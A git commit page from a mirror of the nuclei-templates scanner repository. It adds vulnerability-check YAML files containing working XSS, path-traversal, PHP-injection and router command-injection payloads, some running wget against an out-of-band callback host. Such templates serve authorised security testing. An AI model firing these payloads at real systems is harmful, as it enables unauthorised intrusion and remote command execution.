daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #75 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-07-18 13:08:23 +05:30 committed by GitHub
parent 8895e4727c 24042afb39
commit dd8f248892
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
53 changed files with 1508 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 |
| takeovers | 70 | exposures | 116 | technologies | 120 |
| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 |
| takeovers | 70 | exposures | 116 | technologies | 125 |
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
| default-logins | 37 | file | 42 | dns | 10 |
| default-logins | 44 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 18 |
**128 directories, 1551 files**.
**134 directories, 1596 files**.
</td>
</tr>

24
cves/2009/CVE-2009-1558.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2009-1558
info:
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

34
cves/2012/CVE-2012-1835.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2012-1835
info:
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

38
cves/2013/CVE-2013-3827.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2013-3827
info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
requests:
- method: GET
path:
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000128.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000128
info:
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2016/CVE-2016-1000129.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000129
info:
name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2016/CVE-2016-1000130.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000130
info:
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin e-search v1.0
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000131.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000131
info:
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2016/CVE-2016-1000132.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000132
info:
name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2016/CVE-2016-1000133.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000133
info:
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2016/CVE-2016-1000134.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000134
info:
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin hdw-tube v1.2
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2016/CVE-2016-1000135.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000135
info:
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin hdw-tube v1.2
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-10960.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-10960
info:
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
author: daffainfo
severity: critical
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
reference: |
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
tags: cve,cve2016,wordpress,wp-plugin,rce
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
matchers-condition: and
matchers:
- type: word
words:
- "Nuclei: CVE-2016-10960"
condition: and
part: header
- type: status
status:
- 200

22
cves/2017/CVE-2017-15944.yaml
View File

@ -2,23 +2,27 @@ id: CVE-2017-15944
info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
author: emadshanab,milo2012
reference: |
- https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
requests:
- method: GET
path:
- "{{BaseURL}}/global-protect/portal/css/login.css"
- raw:
- |
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{randstr}};
matchers-condition: and
matchers:
- type: word
words:
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
part: header
- "@start@Success@end@"
part: body
- type: status
status:
- 200
- 200

30
cves/2017/CVE-2017-17043.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2017-17043
info:
name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

34
cves/2017/CVE-2017-17059.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2017-17059
info:
name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
reference: |
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
body: "amty_hidden=1"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2017/CVE-2017-17451.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2017-17451
info:
name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2017/CVE-2017-18536.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2017-18536
info:
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=javascript:prompt(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2017/CVE-2017-9288.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2017-9288
info:
name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2018/CVE-2018-11709.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-11709
info:
name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
tags: cve,cve2018,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2018/CVE-2018-12031.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-12031
info:
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
author: daffainfo
severity: high
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
reference: |
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
- https://www.exploit-db.com/exploits/48614
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:
- 200

30
cves/2018/CVE-2018-20462.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-20462
info:
name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
tags: cve,cve2018,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2018/CVE-2018-5316.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-5316
info:
name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
tags: cve,cve2018,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2019/CVE-2019-12616.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-12616
info:
name: phpMyAdmin CSRF
author: Mohammedsaneem
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
severity: medium
tags: cve,cve2019,phpmyadmin,csrf
reference: |
- https://www.phpmyadmin.net/security/PMASA-2019-4/
- https://www.exploit-db.com/exploits/46982
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
requests:
- method: GET
path:
- "{{BaseURL}}/phpmyadmin/"
matchers-condition: and
matchers:
- type: word
words:
- "4.6.6deb4+deb9u2"
- "phpMyAdmin"
condition: and
- type: status
status:
- 200

32
cves/2019/CVE-2019-15713.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2019-15713
info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: |
- https://wpscan.com/vulnerability/9267
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=confirm(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2019/CVE-2019-16332.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2019-16332
info:
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2019/CVE-2019-16525.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2019-16525
info:
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

26
cves/2019/CVE-2019-20085.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2019-20085
info:
name: TVT NVMS 1000 - Directory Traversal
author: daffainfo
severity: high
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311
tags: cve,cve2019,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "\\[(font|extension|file)s\\]"
part: body
- type: status
status:
- 200

2
cves/2020/CVE-2020-12054.yaml
View File

@ -18,7 +18,9 @@ requests:
- type: word
words:
- "<img src=x onerror=alert(123);>"
- "catch-breadcrumb"
part: body
condition: and
- type: word
part: header

5
cves/2020/CVE-2020-17362.yaml
View File

@ -20,6 +20,11 @@ requests:
- "<img src onerror=alert(123)>"
part: body
- type: word
words:
- "nova-lite"
part: body
- type: word
part: header
words:

35
cves/2020/CVE-2020-25506.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2020-25506
info:
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
reference: |
- https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
tags: cve,cve2020,dlink,rce,oob
requests:
- raw:
- |
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
- |
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

28
cves/2020/CVE-2020-26919.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2020-26919
info:
name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
reference: |
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
tags: cve,cve2020,netgear,rce,oob
requests:
- raw:
- |
POST /login.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

29
cves/2020/CVE-2020-35713.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2020-35713
info:
name: Linksys RE6500 Pre-Auth RCE
author: gy741
severity: critical
reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
tags: cve,cve2020,linksys,rce,oob,router
requests:
- raw:
- |
POST /goform/setSysAdm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/login.shtml
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

32
cves/2021/CVE-2021-31755.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-31755
info:
name: Tenda Router AC11 RCE
description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
author: gy741
severity: critical
reference: |
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
tags: cve,cve2021,tenda,rce,oob
requests:
- raw:
- |
POST /goform/setmac HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/index.htmlr
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Content-Type: application/x-www-form-urlencoded
